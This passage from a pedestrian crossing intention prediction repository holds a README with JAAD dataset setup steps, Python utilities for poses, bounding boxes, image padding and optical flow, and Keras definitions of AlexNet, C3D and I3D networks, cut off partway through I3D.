"num_lines": 90, "path": "/readme.md", "repo_name": "dschoerk/Pedestrian_Crossing_Intention_Prediction", "src_encoding": "UTF-8", "text": "# Pedestrian Crossing Intention Prediction \n \n## Notification \n\n**Predicting Pedestrian Crossing Intention with Feature Fusion and Spatio-Temporal Attention.** \n\n<p align=\"center\">\n<img src=\"model.png\" alt=\"Our proposed model\" align=\"middle\" width=\"800\"/>\n</p>\n\nPaper in ArXiv: https://arxiv.org/pdf/2104.05485v1.pdf (submitted to IROS 2021) \n\nThis work improves the existing pedestrian crossing intention prediction method and achieves the latest state-of-the-art performance. \n\nThis work is heavily relied on the pedestrian action prediction benchmark: `Kotseruba, Iuliia, Amir Rasouli, and John K. Tsotsos. \"Benchmark for Evaluating Pedestrian Action Prediction.\" In Proceedings of the IEEE/CVF Winter Conference on Applications of Computer Vision, pp. 1258-1268, 2021.`\n\n## Environment \n\npython = 3.8 \ntensorflow-gpu = 2.2 \nnumpy, opencv, PIL, matplotlib, etc \nCPU:i7-6700K, GPU:RTX-2070super \n\n## Dataset Preparation \n\nDownload the [JAAD Annotation](https://github.com/ykotseruba/JAAD) and put `JAAD` file to this project's root directory (as `./JAAD`). \n\nDownload the [JAAD Dataset](http://data.nvision2.eecs.yorku.ca/JAAD_dataset/), and then put the video file `JAAD_clips` into `./JAAD` (as `./JAAD/JAAD_clips`). \n\nCopy `jaad_data.py` from the corresponding repositories into this project's root directory (as `./jaad_data.py`). \n\nIn order to use the data, first, the video clips should be converted into images. This can be done using script `./JAAD/split_clips_to_frames.sh` following JAAD dataset's instruction. \n\nAbove operation will create a folder called `images` and save the extracted images grouped by corresponding video ids in the `./JAAD/images `folder. \n```\n./JAAD/images/video_0001/\n\t\t\t\t00000.png\n\t\t\t\t00001.png\n\t\t\t\t...\n./JAAD/images/video_0002/\n\t\t\t\t00000.png\n\t\t\t\t00001.png\n\t\t\t\t...\t\t\n...\n```\n## Training \n\nNote: our model extracts the semantic mask via DeeplabV3 (you need download pretrained segmentation model [deeplabv3](http://download.tensorflow.org/models/deeplabv3_mnv2_cityscapes_train_2018_02_05.tar.gz) before training and put checkpoint file into this project's root directory (as `./deeplabv3_mnv2_cityscapes_train_2018_02_05.tar.gz`) so that the model can obtain the input semantic data). \n\nUse `train_test.py` script with `config_file`:\n```\npython train_test.py -c <config_file>\n```\n\nAll config_files are saved in `./config_files` and you can review all offered model configs in `./config_files/config_list.yaml` and all offered model architectures in `./model_imgs` corresponding to configs. \n\nFor example, to train MASK-PCPA model run: \n\n```\npython train_test.py -c config_files/ours/MASK_PCPA_jaad_2d.yaml\n``` \n\nThe script will automatially save the trained model weights, configuration file and evaluation results in `models/<dataset>/<model_name>/<current_date>/` folder.\n\nSee comments in the `configs_default.yaml` and `action_predict.py` for parameter descriptions.\n\nModel-specific YAML files contain experiment options `exp_opts` that overwrite options in `configs_default.yaml`. \n\n\n## Test saved model \n\nTo re-run test on the saved model use: \n\n```\npython test_model.py <saved_files_path>\n```\n\nFor example: \n```\npython test_model.py models/jaad/MASK_PCPA/xxxx/\n``` \n\nYou can download our pretrained models from [Google Drive (to do)](https://drive.google.com/drive/) \nor [BaiduDisk](https://pan.baidu.com/s/1GTvrcfe4a34sfwydVSQDqg) (password: v90h) for testing. \n\n## TODO Lists\n\n- [x] Readme Completion\n- [x] Pretrained Model\n- [ ] Support PIE Dataset\n" }, { "alpha_fraction": 0.5361634492874146, "alphanum_fraction": 0.5618847012519836, "avg_line_length": 32.66666793823242, "blob_id": "3bf8844a26ffbe767cb6063b1793b3ec216e5676", "content_id": "1d9e4795637b54498c7b7dc2a0cae0065696d677", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17573, "license_type": "permissive", "max_line_length": 111, "num_lines": 522, "path": "/utils.py", "repo_name": "dschoerk/Pedestrian_Crossing_Intention_Prediction", "src_encoding": "UTF-8", "text": "import sys\nimport PIL\nimport os\nimport pickle\nimport numpy as np\nimport cv2\nfrom tensorflow.keras.preprocessing.image import load_img\nfrom sklearn.metrics import accuracy_score\n\n# Data utilities\ndef flip_pose(pose):\n \"\"\"\n Flips a given pose coordinates\n Args:\n pose: The original pose\n Return:\n Flipped poses\n \"\"\"\n # [nose(0,1), neck(2,3), Rsho(4,5), Relb(6,7), Rwri(8,9),\n # \t\t\t\t\t\t Lsho(10,11), Lelb(12,13), Lwri(14,15),\n #\t\t\t\t\t\t Rhip(16,17), Rkne(18,19), Rank(20,21),\n # Lhip(22,23), Lkne(24,25), Lank(26,27),\n #\t\t\t\t\t\t Leye(28,29), Reye (30,31),\n #\t\t\t\t\t\t Lear(32,33), Rear(34,35)]\n flip_map = [0, 1, 2, 3, 10, 11, 12, 13, 14, 15, 4, 5, 6, 7, 8, 9, 22, 23, 24, 25,\n 26, 27, 16, 17, 18, 19, 20, 21, 30, 31, 28, 29, 34, 35, 32, 33]\n new_pose = pose.copy()\n flip_pose = [0] * len(new_pose)\n for i in range(len(new_pose)):\n if i % 2 == 0 and new_pose[i] != 0:\n new_pose[i] = 1 - new_pose[i]\n flip_pose[flip_map[i]] = new_pose[i]\n return flip_pose\n\n\ndef get_pose(img_sequences,\n ped_ids, file_path,\n data_type='train',\n dataset='pie'):\n \"\"\"\n Reads the pie poses from saved .pkl files\n Args:\n img_sequences: Sequences of image names\n ped_ids: Sequences of pedestrian ids\n file_path: Path to where poses are saved\n data_type: Whether it is for training or testing\n Return:\n Sequences of poses\n \"\"\"\n\n print('\\n#####################################')\n print('Getting poses %s' % data_type)\n print('#####################################')\n poses_all = []\n set_poses_list = [x for x in os.listdir(file_path) if x.endswith('.pkl')]\n set_poses = {}\n for s in set_poses_list:\n with open(os.path.join(file_path, s), 'rb') as fid:\n try:\n p = pickle.load(fid)\n except:\n p = pickle.load(fid, encoding='bytes')\n set_poses[s.split('.pkl')[0].split('_')[-1]] = p\n i = -1\n for seq, pid in zip(img_sequences, ped_ids):\n i += 1\n update_progress(i / len(img_sequences))\n pose = []\n for imp, p in zip(seq, pid):\n flip_image = False\n \n if dataset == 'pie':\n set_id = imp.split('/')[-3]\n elif dataset == 'jaad':\n set_id = 'set01'\n \n vid_id = imp.split('/')[-2]\n img_name = imp.split('/')[-1].split('.')[0]\n if 'flip' in img_name:\n img_name = img_name.replace('_flip', '')\n flip_image = True\n k = img_name + '_' + p[0]\n if k in set_poses[set_id][vid_id].keys():\n # [nose, neck, Rsho, Relb, Rwri, Lsho, Lelb, Lwri, Rhip, Rkne,\n # Rank, Lhip, Lkne, Lank, Leye, Reye, Lear, Rear, pt19]\n if flip_image:\n pose.append(flip_pose(set_poses[set_id][vid_id][k]))\n else:\n pose.append(set_poses[set_id][vid_id][k])\n else:\n pose.append([0] * 36)\n poses_all.append(pose)\n poses_all = np.array(poses_all)\n return poses_all\n\n\ndef jitter_bbox(img_path, bbox, mode, ratio):\n \"\"\"\n Jitters the position or dimensions of the bounding box.\n Args:\n img_path: The to the image\n bbox: The bounding box to be jittered\n mode: The mode of jitterring. Options are,\n 'same' returns the bounding box unchanged\n 'enlarge' increases the size of bounding box based on the given ratio.\n 'random_enlarge' increases the size of bounding box by randomly sampling a value in [0,ratio)\n 'move' moves the center of the bounding box in each direction based on the given ratio\n 'random_move' moves the center of the bounding box in each direction by randomly\n sampling a value in [-ratio,ratio)\n ratio: The ratio of change relative to the size of the bounding box.\n For modes 'enlarge' and 'random_enlarge'\n the absolute value is considered.\n Return:\n Jitterred bounding boxes\n \"\"\"\n\n assert (mode in ['same', 'enlarge', 'move', 'random_enlarge', 'random_move']), \\\n 'mode %s is invalid.' % mode\n\n if mode == 'same':\n return bbox\n\n img = load_img(img_path)\n\n if mode in ['random_enlarge', 'enlarge']:\n jitter_ratio = abs(ratio)\n else:\n jitter_ratio = ratio\n\n if mode == 'random_enlarge':\n jitter_ratio = np.random.random_sample() * jitter_ratio\n elif mode == 'random_move':\n # for ratio between (-jitter_ratio, jitter_ratio)\n # for sampling the formula is [a,b), b > a,\n # random_sample * (b-a) + a\n jitter_ratio = np.random.random_sample() * jitter_ratio * 2 - jitter_ratio\n\n jit_boxes = []\n for b in bbox:\n bbox_width = b[2] - b[0]\n bbox_height = b[3] - b[1]\n\n width_change = bbox_width * jitter_ratio\n height_change = bbox_height * jitter_ratio\n\n if width_change < height_change:\n height_change = width_change\n else:\n width_change = height_change\n\n if mode in ['enlarge', 'random_enlarge']:\n b[0] = b[0] - width_change // 2\n b[1] = b[1] - height_change // 2\n else:\n b[0] = b[0] + width_change // 2\n b[1] = b[1] + height_change // 2\n\n b[2] = b[2] + width_change // 2\n b[3] = b[3] + height_change // 2\n\n # Checks to make sure the bbox is not exiting the image boundaries\n b = bbox_sanity_check(img.size, b)\n jit_boxes.append(b)\n # elif crop_opts['mode'] == 'border_only':\n return jit_boxes\n\n\ndef squarify(bbox, squarify_ratio, img_width):\n \"\"\"\n Changes the dimensions of a bounding box to a fixed ratio\n Args:\n bbox: Bounding box\n squarify_ratio: Ratio to be changed to\n img_width: Image width\n Return:\n Squarified boduning boxes\n \"\"\"\n width = abs(bbox[0] - bbox[2])\n height = abs(bbox[1] - bbox[3])\n width_change = height * squarify_ratio - width\n bbox[0] = bbox[0] - width_change / 2\n bbox[2] = bbox[2] + width_change / 2\n # Squarify is applied to bounding boxes in Matlab coordinate starting from 1\n if bbox[0] < 0:\n bbox[0] = 0\n\n # check whether the new bounding box goes beyond image boarders\n # If this is the case, the bounding box is shifted back\n if bbox[2] > img_width:\n # bbox[1] = str(-float(bbox[3]) + img_dimensions[0])\n bbox[0] = bbox[0] - bbox[2] + img_width\n bbox[2] = img_width\n return bbox\n\n\ndef update_progress(progress):\n \"\"\"\n Shows the progress\n Args:\n progress: Progress thus far\n \"\"\"\n barLength = 20 # Modify this to change the length of the progress bar\n status = \"\"\n if isinstance(progress, int):\n progress = float(progress)\n\n block = int(round(barLength * progress))\n text = \"\\r[{}] {:0.2f}% {}\".format(\"#\" * block + \"-\" * (barLength - block), progress * 100, status)\n sys.stdout.write(text)\n sys.stdout.flush()\n\n\ndef img_pad_pil(img, mode='warp', size=224):\n \"\"\"\n Pads and/or resizes a given image\n Args:\n img: The image to be coropped and/or padded\n mode: The type of padding or resizing. Options are,\n warp: crops the bounding box and resize to the output size\n same: only crops the image\n pad_same: maintains the original size of the cropped box and pads with zeros\n pad_resize: crops the image and resize the cropped box in a way that the longer edge is equal to\n the desired output size in that direction while maintaining the aspect ratio. The rest\n of the image is\tpadded with zeros\n pad_fit: maintains the original size of the cropped box unless the image is bigger than the size\n in which case it scales the image down, and then pads it\n size: Target size of image\n Return:\n Padded image\n \"\"\"\n assert (mode in ['same', 'warp', 'pad_same', 'pad_resize', 'pad_fit']), 'Pad mode %s is invalid' % mode\n image = img.copy()\n if mode == 'warp':\n warped_image = image.resize((size, size), PIL.Image.NEAREST)\n return warped_image\n elif mode == 'same':\n return image\n elif mode in ['pad_same', 'pad_resize', 'pad_fit']:\n img_size = image.size # size is in (width, height)\n ratio = float(size) / max(img_size)\n if mode == 'pad_resize' or \\\n (mode == 'pad_fit' and (img_size[0] > size or img_size[1] > size)):\n img_size = tuple([int(img_size[0] * ratio), int(img_size[1] * ratio)])\n image = image.resize(img_size, PIL.Image.NEAREST)\n padded_image = PIL.Image.new(\"RGB\", (size, size))\n padded_image.paste(image, ((size - img_size[0]) // 2,\n (size - img_size[1]) // 2))\n return padded_image\n\ndef img_pad(img, mode='warp', size=224):\n \"\"\"\n Pads and/or resizes a given image\n Args:\n img: The image to be coropped and/or padded\n mode: The type of padding or resizing. Options are,\n warp: crops the bounding box and resize to the output size\n same: only crops the image\n pad_same: maintains the original size of the cropped box and pads with zeros\n pad_resize: crops the image and resize the cropped box in a way that the longer edge is equal to\n the desired output size in that direction while maintaining the aspect ratio. The rest\n of the image is\tpadded with zeros\n pad_fit: maintains the original size of the cropped box unless the image is bigger than the size\n in which case it scales the image down, and then pads it\n size: Target size of image\n Return:\n Padded image\n \"\"\"\n assert (mode in ['same', 'warp', 'pad_same', 'pad_resize', 'pad_fit']), 'Pad mode %s is invalid' % mode\n image = np.copy(img)\n if mode == 'warp':\n warped_image = cv2.resize(img, (size, size))\n return warped_image\n elif mode == 'same':\n return image\n elif mode in ['pad_same', 'pad_resize', 'pad_fit']:\n img_size = image.shape[:2][::-1] # original size is in (height, width)\n ratio = float(size)/max(img_size)\n if mode == 'pad_resize' or \\\n (mode == 'pad_fit' and (img_size[0] > size or img_size[1] > size)):\n img_size = tuple([int(img_size[0] * ratio), int(img_size[1] * ratio)])\n image = cv2.resize(image, img_size)\n padded_image = np.zeros((size, size)+(image.shape[-1],), dtype=img.dtype)\n w_off = (size-img_size[0])//2\n h_off = (size-img_size[1])//2\n padded_image[h_off:h_off + img_size[1], w_off:w_off+ img_size[0],:] = image\n return padded_image\n\n\ndef bbox_sanity_check(img_size, bbox):\n \"\"\"\n Checks whether bounding boxes are within image boundaries.\n If this is not the case, modifications are applied.\n Args:\n img_size: The size of the image\n bbox: The bounding box coordinates\n Return:\n The modified/original bbox\n \"\"\"\n img_width, img_heigth = img_size\n if bbox[0] < 0:\n bbox[0] = 0.0\n if bbox[1] < 0:\n bbox[1] = 0.0\n if bbox[2] >= img_width:\n bbox[2] = img_width - 1\n if bbox[3] >= img_heigth:\n bbox[3] = img_heigth - 1\n return bbox\n\n\ndef get_path(file_name='',\n sub_folder='',\n save_folder='models',\n dataset='pie',\n save_root_folder='data/'):\n \"\"\"\n Generates paths for saving model and config data.\n Args:\n file_name: The actual save file name , e.g. 'model.h5'\n sub_folder: If another folder to be created within the root folder\n save_folder: The name of folder containing the saved files\n dataset: The name of the dataset used\n save_root_folder: The root folder\n Return:\n The full path and the path to save folder\n \"\"\"\n save_path = os.path.join(save_root_folder, dataset, save_folder, sub_folder)\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n return os.path.join(save_path, file_name), save_path\n\n\n# Optical flow utilities\nUNKNOWN_FLOW_THRESH = 1e7\nSMALLFLOW = 0.0\nLARGEFLOW = 1e8\n\n\ndef read_flow_file(optflow_path):\n with open(optflow_path, 'rb') as f:\n tag = np.fromfile(f, np.float32, count=1)\n data2d = None\n assert tag == 202021.25, 'Incorrect .flo file, {}'.format(optflow_path)\n w = np.fromfile(f, np.int32, count=1)[0]\n h = np.fromfile(f, np.int32, count=1)[0]\n data2d = np.fromfile(f, np.float32, count=2 * w * h)\n # reshape data into 3D array (columns, rows, channels)\n return np.resize(data2d, (h, w, 2))\ndef write_flow(flow, optflow_path):\n with open(optflow_path, 'wb') as f:\n magic = np.array([202021.25], dtype=np.float32)\n (height, width) = flow.shape[0:2]\n w = np.array([width], dtype=np.int32)\n h = np.array([height], dtype=np.int32)\n magic.tofile(f)\n w.tofile(f)\n h.tofile(f)\n flow.tofile(f)\n\n\ndef make_color_wheel():\n \"\"\"\n Generate color wheel according Middlebury color code\n :return: Color wheel\n \"\"\"\n RY = 15\n YG = 6\n GC = 4\n CB = 11\n BM = 13\n MR = 6\n\n ncols = RY + YG + GC + CB + BM + MR\n\n colorwheel = np.zeros([ncols, 3])\n\n col = 0\n\n # RY\n colorwheel[0:RY, 0] = 255\n colorwheel[0:RY, 1] = np.transpose(np.floor(255*np.arange(0, RY) / RY))\n col += RY\n\n # YG\n colorwheel[col:col+YG, 0] = 255 - np.transpose(np.floor(255*np.arange(0, YG) / YG))\n colorwheel[col:col+YG, 1] = 255\n col += YG\n\n # GC\n colorwheel[col:col+GC, 1] = 255\n colorwheel[col:col+GC, 2] = np.transpose(np.floor(255*np.arange(0, GC) / GC))\n col += GC\n\n # CB\n colorwheel[col:col+CB, 1] = 255 - np.transpose(np.floor(255*np.arange(0, CB) / CB))\n colorwheel[col:col+CB, 2] = 255\n col += CB\n\n # BM\n colorwheel[col:col+BM, 2] = 255\n colorwheel[col:col+BM, 0] = np.transpose(np.floor(255*np.arange(0, BM) / BM))\n col += + BM\n\n # MR\n colorwheel[col:col+MR, 2] = 255 - np.transpose(np.floor(255 * np.arange(0, MR) / MR))\n colorwheel[col:col+MR, 0] = 255\n\n return colorwheel\ndef compute_color(u, v):\n \"\"\"\n compute optical flow color map\n :param u: optical flow horizontal map\n :param v: optical flow vertical map\n :return: optical flow in color code\n \"\"\"\n [h, w] = u.shape\n img = np.zeros([h, w, 3])\n nanIdx = np.isnan(u) | np.isnan(v)\n u[nanIdx] = 0\n v[nanIdx] = 0\n\n colorwheel = make_color_wheel()\n ncols = np.size(colorwheel, 0)\n\n rad = np.sqrt(u ** 2 + v ** 2)\n\n a = np.arctan2(-v, -u) / np.pi\n\n fk = (a + 1) / 2 * (ncols - 1) + 1\n\n k0 = np.floor(fk).astype(int)\n\n k1 = k0 + 1\n k1[k1 == ncols + 1] = 1\n f = fk - k0\n\n for i in range(0, np.size(colorwheel, 1)):\n tmp = colorwheel[:, i]\n col0 = tmp[k0 - 1] / 255\n col1 = tmp[k1 - 1] / 255\n col = (1 - f) * col0 + f * col1\n\n idx = rad <= 1\n col[idx] = 1 - rad[idx] * (1 - col[idx])\n notidx = np.logical_not(idx)\n\n col[notidx] *= 0.75\n img[:, :, i] = np.uint8(np.floor(255 * col * (1 - nanIdx)))\n\n return img\ndef flow_to_image(flow):\n \"\"\"\n Convert flow into middlebury color code image\n :param flow: optical flow map\n :return: optical flow image in middlebury color\n \"\"\"\n u = flow[:, :, 0]\n v = flow[:, :, 1]\n\n maxu = -999.\n maxv = -999.\n minu = 999.\n minv = 999.\n\n idxUnknow = (abs(u) > UNKNOWN_FLOW_THRESH) | (abs(v) > UNKNOWN_FLOW_THRESH)\n u[idxUnknow] = 0\n v[idxUnknow] = 0\n\n maxu = max(maxu, np.max(u))\n minu = min(minu, np.min(u))\n\n maxv = max(maxv, np.max(v))\n minv = min(minv, np.min(v))\n\n rad = np.sqrt(u ** 2 + v ** 2)\n maxrad = max(-1, np.max(rad))\n\n print(\"max flow: %.4f\\nflow range:\\nu = %.3f .. %.3f\\nv = %.3f .. %.3f\" % (maxrad, minu, maxu, minv, maxv))\n\n u = u / (maxrad + np.finfo(float).eps)\n v = v / (maxrad + np.finfo(float).eps)\n\n img = compute_color(u, v)\n\n idx = np.repeat(idxUnknow[:, :, np.newaxis], 3, axis=2)\n img[idx] = 0\n\n return np.uint8(img)\n\n\ndef tte_weighted_acc(tte, gt, y, weights='quadratic'):\n \"\"\"\n A function to compute time-to-event (TTE) weighted accuracy: \n 1) computes accuracy for unique TTEs in the list,\n 2) computes weighted average of accuracy scores assigning higher weight to higher TTEs.\n \n Args:\n tte: array of TTE values for each sample\n gt: ground truth sample class\n y: predicted sample class\n weights: linear or quadratic\n \"\"\"\n\n sort_idx = np.argsort(tte)\n tte_sorted = tte[sort_idx]\n unq_tte_first = np.concatenate(([True], tte_sorted[1:] != tte_sorted[:-1]))\n unq_tte = tte_sorted[unq_tte_first]\n unq_tte_count = np.diff(np.nonzero(unq_tte_first)[0])\n unq_tte_index = np.split(sort_idx, np.cumsum(unq_tte_count))\n\n acc_tte = []\n for tte, tte_idx in zip(unq_tte, unq_tte_index):\n acc_tte.append(accuracy_score(gt[tte_idx], np.round(y[tte_idx])))\n\n assert weights in ['linear', 'quadratic'], 'Weights type {} is not implemented!'.format(weights)\n\n if weights == 'quadratic':\n unq_tte = np.square(unq_tte)\n\n acc_tte = np.sum(np.multiply(acc_tte, unq_tte)/np.sum(unq_tte))\n\n return acc_tte" }, { "alpha_fraction": 0.5430303812026978, "alphanum_fraction": 0.6104931831359863, "avg_line_length": 45.088233947753906, "blob_id": "a2e9b10706037a5033b4cb0306a78def350bde83", "content_id": "8bca54cc3079cf1ac0a0ed52f477074b0cecfdc8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21938, "license_type": "permissive", "max_line_length": 115, "num_lines": 476, "path": "/base_models.py", "repo_name": "dschoerk/Pedestrian_Crossing_Intention_Prediction", "src_encoding": "UTF-8", "text": "from tensorflow.keras.layers import Conv2D, MaxPooling2D, ZeroPadding2D\nfrom tensorflow.keras.layers import Flatten, Dropout, Activation\nfrom tensorflow.keras.layers import GlobalAveragePooling2D, GlobalMaxPooling2D\nfrom tensorflow.keras.layers import Conv3D, MaxPooling3D, ZeroPadding3D\nfrom tensorflow.keras.layers import AveragePooling3D\nfrom tensorflow.keras.layers import Reshape\nfrom tensorflow.keras.layers import Lambda, BatchNormalization\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input, Concatenate, Dense\nimport tensorflow.keras.backend as K\n\ndef AlexNet(include_top=True,\n weights=None,\n input_tensor=None,\n input_shape=None,\n pooling=None,\n classes=1000,\n classifier_activation='softmax'):\n '''\n Implementation of AlexNet based on the paper\n Krizhevsky, A., Sutskever, I., & Hinton, G. E. (2017). Imagenet classification with \n deep convolutional neural networks. Communications of the ACM, 60(6), 84-90.\n '''\n if input_shape is None:\n input_shape = (227, 227, 3)\n if input_tensor is None:\n inputs = Input(shape=input_shape)\n else:\n inputs = input_tensor\n\n x = inputs\n x = Conv2D(filters=96, kernel_size=11, strides=4, padding='valid', activation='relu')(x)\n x = MaxPooling2D(pool_size=3, strides=2, padding='valid')(x)\n x = ZeroPadding2D((2, 2))(x)\n x = Conv2D(filters=256, kernel_size=5, strides=1, padding='valid', activation='relu')(x)\n x = MaxPooling2D(pool_size=3, strides=2, padding='valid')(x)\n x = ZeroPadding2D((2, 2))(x)\n x = Conv2D(filters=384, kernel_size=3, strides=1, padding='valid', activation='relu')(x)\n x = BatchNormalization()(x)\n x = ZeroPadding2D((1, 1))(x)\n x = Conv2D(filters=384, kernel_size=3, strides=1, padding='valid', activation='relu')(x)\n x = BatchNormalization()(x)\n x = ZeroPadding2D((1, 1))(x)\n x = Conv2D(filters=256, kernel_size=3, strides=1, padding='valid', activation='relu')(x)\n x = MaxPooling2D(pool_size=3, strides=2, padding='valid')(x)\n x = BatchNormalization()(x)\n if include_top:\n x = Flatten(name='flatten')(x)\n x = Dense(4096, activation='relu')(x)\n x = Dropout(0.5)(x)\n x = Dense(4096, activation='relu')(x)\n x = Dropout(0.5)(x)\n x = Dense(classes, activation=classifier_activation)(x)\n else:\n if pooling == 'avg':\n x = GlobalAveragePooling2D()(x)\n elif pooling == 'max':\n x = GlobalMaxPooling2D()(x)\n model = Model(inputs, x, name='alexnet')\n\n # if weights == 'imagenet':\n # model.load_weights('weights/alexnet_weights_tensorflow.h5', by_name=True)\n\n return model\n\n\ndef convert_to_fcn(model, classes=2, activation='softmax',\n pooling='avg', features=False, model_type='alexnet'):\n \"\"\"\n Converts a given CNN model to a FCN model\n Args:\n model: The model object\n classes: Number of classes\n activation: Type of activation for the last layer\n pooling: Pooling type for generating features\n features: Whether to return convolutional features or apply global pooling and activation\n model_type: The type of CNN. Support alexnet, vgg16, and resnet50\n Returns:\n Model object\n \"\"\"\n num_filters = 4096\n if 'resnet' in model_type:\n num_filters = 2048\n x = Conv2D(filters=num_filters, kernel_size=(6, 6), strides=(1, 1), padding='valid')(model.output)\n x = Conv2D(filters=num_filters, kernel_size=(1, 1), strides=(1, 1), padding='valid')(x)\n x = Conv2D(filters=classes, kernel_size=(1, 1), strides=(1, 1), padding='valid')(x)\n\n if features:\n if pooling == 'avg':\n x = Lambda(lambda x: K.mean(x, axis=-1))(x)\n else:\n x = Lambda(lambda x: K.max(x, axis=-1))(x)\n x = Flatten(name='fcn_features')(x)\n else:\n x = GlobalMaxPooling2D()(x)\n x = Activation(activation)(x)\n return Model(model.input, x)\n\n\ndef C3DNet(freeze_conv_layers=False, weights=None,\n dense_activation='softmax', dropout=0.5, include_top=False,input_data = Input(shape=(16, 112, 112, 3))):\n \"\"\"\n C3D model implementation. Source: https://github.com/adamcasson/c3d\n Reference: Du Tran, Lubomir Bourdev, Rob Fergus, Lorenzo Torresani,and Manohar Paluri. \n Learning spatiotemporal features with 3D convolutional networks. ICCV, 2015.\n Args:\n freeze_conv_layers: Whether to freeze convolutional layers at the time of training\n weights: Pre-trained weights\n dense_activation: Activation of the last layer\n dropout: Dropout of dense layers\n include_top: Whether to add fc layers\n Returns:\n C3D model\n \"\"\"\n # input_data = Input(shape=(16, 112, 112, 3))\n model = Conv3D(64, 3, activation='relu', padding='same', name='conv1')(input_data)\n model = MaxPooling3D(pool_size=(1, 2, 2), strides=(1, 2, 2), padding='valid', name='pool1')(model)\n # 2nd layer group\n model = Conv3D(128, 3, activation='relu', padding='same', name='conv2')(model)\n model = MaxPooling3D(pool_size=(2, 2, 2), strides=(2, 2, 2), padding='valid', name='pool2')(model)\n # 3rd layer group\n model = Conv3D(256, 3, activation='relu', padding='same', name='conv3a')(model)\n model = Conv3D(256, 3, activation='relu', padding='same', name='conv3b')(model)\n model = MaxPooling3D(pool_size=(2, 2, 2), strides=(2, 2, 2), padding='valid', name='pool3')(model)\n # 4th layer group\n model = Conv3D(512, 3, activation='relu', padding='same', name='conv4a')(model)\n model = Conv3D(512, 3, activation='relu', padding='same', name='conv4b')(model)\n model = MaxPooling3D(pool_size=(2, 2, 2), strides=(2, 2, 2), padding='valid', name='pool4')(model)\n # 5th layer group\n model = Conv3D(512, 3, activation='relu', padding='same', name='conv5a')(model)\n model = Conv3D(512, 3, activation='relu', padding='same', name='conv5b')(model)\n model = ZeroPadding3D(padding=(0, 1, 1), name='zeropad5')(model) # ((0, 0), (0, 1), (0, 1))\n model = MaxPooling3D(pool_size=(2, 2, 2), strides=(2, 2, 2), padding='valid', name='pool5')(model)\n model_flatten = Flatten(name='flatten')(model)\n\n # # FC layers group\n model = Dense(4096, activation='relu', name='fc6')(model_flatten)\n model = Dropout(dropout)(model)\n model = Dense(4096, activation='relu', name='fc7')(model)\n model_fc7 = Dropout(dropout)(model)\n model_fc8 = Dense(487, activation=dense_activation, name='fc8')(model_fc7)\n\n net_model = Model(input_data, model_fc8)\n if weights is not None:\n net_model.load_weights(weights)\n\n if include_top:\n model_fc8_new = Dense(1, activation=dense_activation, name='fc8')(model_fc7)\n net_model = Model(input_data, model_fc8_new)\n if freeze_conv_layers:\n for layer in model.layers[:-5]:\n layer.trainable = False\n for layer in model.layers:\n print(layer.name, layer.trainable)\n else:\n net_model = Model(input_data, model_flatten)\n\n return net_model\n\n\ndef C3DNet2(freeze_conv_layers=False, weights=None,\n dense_activation='softmax', dropout=0.5, include_top=False,input_data=Input(shape=(16, 112, 112, 3))):\n \"\"\"\n C3D model implementation. Source: https://github.com/adamcasson/c3d\n Reference: Du Tran, Lubomir Bourdev, Rob Fergus, Lorenzo Torresani,and Manohar Paluri.\n Learning spatiotemporal features with 3D convolutional networks. ICCV, 2015.\n Args:\n freeze_conv_layers: Whether to freeze convolutional layers at the time of training\n weights: Pre-trained weights\n dense_activation: Activation of the last layer\n dropout: Dropout of dense layers\n include_top: Whether to add fc layers\n Returns:\n C3D model\n \"\"\"\n # Input(shape=data_sizes[i], name='input_' + data_types[i])\n # input_data = Input(shape=(16, 112, 112, 3))\n\n model = Conv3D(64, 3, activation='relu', padding='same', name='conv1_2')(input_data)\n model = MaxPooling3D(pool_size=(1, 2, 2), strides=(1, 2, 2), padding='valid', name='pool1_2')(model)\n # 2nd layer group\n model = Conv3D(128, 3, activation='relu', padding='same', name='conv2_2')(model)\n model = MaxPooling3D(pool_size=(2, 2, 2), strides=(2, 2, 2), padding='valid', name='pool2_2')(model)\n # 3rd layer group\n model = Conv3D(256, 3, activation='relu', padding='same', name='conv3a_2')(model)\n model = Conv3D(256, 3, activation='relu', padding='same', name='conv3b_2')(model)\n model = MaxPooling3D(pool_size=(2, 2, 2), strides=(2, 2, 2), padding='valid', name='pool3_2')(model)\n # 4th layer group\n model = Conv3D(512, 3, activation='relu', padding='same', name='conv4a_2')(model)\n model = Conv3D(512, 3, activation='relu', padding='same', name='conv4b_2')(model)\n model = MaxPooling3D(pool_size=(2, 2, 2), strides=(2, 2, 2), padding='valid', name='pool4_2')(model)\n # 5th layer group\n model = Conv3D(512, 3, activation='relu', padding='same', name='conv5a_2')(model)\n model = Conv3D(512, 3, activation='relu', padding='same', name='conv5b_2')(model)\n model = ZeroPadding3D(padding=(0, 1, 1), name='zeropad5_2')(model) # ((0, 0), (0, 1), (0, 1))\n model = MaxPooling3D(pool_size=(2, 2, 2), strides=(2, 2, 2), padding='valid', name='pool5_2')(model)\n model_flatten = Flatten(name='flatten_2')(model)\n\n # # FC layers group\n model = Dense(4096, activation='relu', name='fc6_2')(model_flatten)\n model = Dropout(dropout)(model)\n model = Dense(4096, activation='relu', name='fc7_2')(model)\n model_fc7 = Dropout(dropout)(model)\n model_fc8 = Dense(487, activation=dense_activation, name='fc8_2')(model_fc7)\n\n net_model = Model(input_data, model_fc8)\n if weights is not None:\n net_model.load_weights(weights)\n\n if include_top:\n model_fc8_new = Dense(1, activation=dense_activation, name='fc8_2')(model_fc7)\n net_model = Model(input_data, model_fc8_new)\n if freeze_conv_layers:\n for layer in model.layers[:-5]:\n layer.trainable = False\n for layer in model.layers:\n print(layer.name, layer.trainable)\n else:\n net_model = Model(input_data, model_flatten)\n\n return net_model\n\ndef I3DNet(freeze_conv_layers=False, weights=None, classes=1,\n dense_activation='softmax', dropout=0.5, num_channels=3, include_top=False):\n \"\"\"\n I3D model implementation. Source: https://github.com/dlpbc/keras-kinetics-i3d\n Reference: Joao Carreira and Andrew Zisserman. Quo vadis, action recognition?\n A new model and the kinetics dataset. CVPR, 2017.\n Args:\n freeze_conv_layers: Whether to freeze convolutional layers at the time of training\n weights: Pre-trained weights\n classes: Number of classes\n dense_activation: Activation of the last layer\n dropout: Dropout of dense layers\n include_top: Whether to add fc layers\n Returns:\n I3D model\n \"\"\"\n def conv3d_bn(x,\n filters,\n num_frames,\n num_row,\n num_col,\n padding='same',\n strides=(1, 1, 